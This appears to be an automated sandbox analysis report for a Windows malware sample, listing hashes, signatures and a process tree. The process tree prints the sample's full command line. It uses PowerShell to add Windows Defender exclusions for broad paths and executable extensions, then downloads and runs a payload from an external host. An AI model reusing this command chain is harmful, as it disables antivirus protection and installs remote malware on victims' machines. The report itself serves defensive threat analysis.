Analysis
-
max time kernel
122s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 20:01
Static task
static1
Behavioral task
behavioral1
Sample
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe
-
Size
5KB
-
MD5
ee53c22fb468250a322d4e4af41d7cf4
-
SHA1
ad4fd512fbe16266cc5d61557a7586e7acb92ac5
-
SHA256
064108b26f82e4cf579d93efb547401cc61436c1027edede6bd5ecf601cc8b8a
-
SHA512
2e3af9ac12cc85e3f5a84dec9114c392f643389a1e29b9b85eadcab17671baadc640265bc52463d14fe603211ee0d2a6e6ec1cf495dede8b8aa3592a09d1d2ec
-
SSDEEP
96:xFNM1k9DrbN793yG6dihlu6O4mNnkOGX3aLlYR:xvuAF93yXihf9EUXaY
Malware Config
Extracted
http://f0550716.xsph.ru/U3ew1mckZfTHHAs
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2680 powershell.exe -
pid Process 2680 powershell.exe 1728 powershell.exe 2664 powershell.exe 2672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2664 powershell.exe 2672 powershell.exe 2680 powershell.exe 1728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2672 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2760 3028 ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe 30 PID 3028 wrote to memory of 2760 3028 ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe 30 PID 3028 wrote to memory of 2760 3028 ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe 30 PID 2760 wrote to memory of 2664 2760 cmd.exe 32 PID 2760 wrote to memory of 2664 2760 cmd.exe 32 PID 2760 wrote to memory of 2664 2760 cmd.exe 32 PID 2760 wrote to memory of 2672 2760 cmd.exe 33 PID 2760 wrote to memory of 2672 2760 cmd.exe 33 PID 2760 wrote to memory of 2672 2760 cmd.exe 33 PID 2760 wrote to memory of 2680 2760 cmd.exe 34 PID 2760 wrote to memory of 2680 2760 cmd.exe 34 PID 2760 wrote to memory of 2680 2760 cmd.exe 34 PID 2760 wrote to memory of 1728 2760 cmd.exe 35 PID 2760 wrote to memory of 1728 2760 cmd.exe 35 PID 2760 wrote to memory of 1728 2760 cmd.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\ee53c22fb468250a322d4e4af41d7cf4_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force & powershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', '%Temp%\\system32.scr') & powershell Start-Process -FilePath '%Temp%\\system32.scr' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath @('C:\Users\Admin','C:\Users\Admin\AppData\Roaming','C:\Users\Admin\AppData\Local\Temp','C:\Windows','C:','C:') -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension @('exe','scr','bat','dll') -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://f0550716.xsph.ru/U3ew1mckZfTHHAs', 'C:\Users\Admin\AppData\Local\Temp\\system32.scr')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\system32.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5301b36720233e2a5439980ed539951ee
SHA10eb75505b9e634bf785a80736fc12792cce19f5f
SHA256f5f86a9b809ab87cf21bd4e1ef45edad6d9074b1b5f0a801981cb18b6030673b
SHA5121157fae6dca4d033f0b494ec51c43f268b53069b2f80aba3dbbbda29237035b54c85a475129e581db8669db6e598a412e8276536be6b6599039a0b268ddac435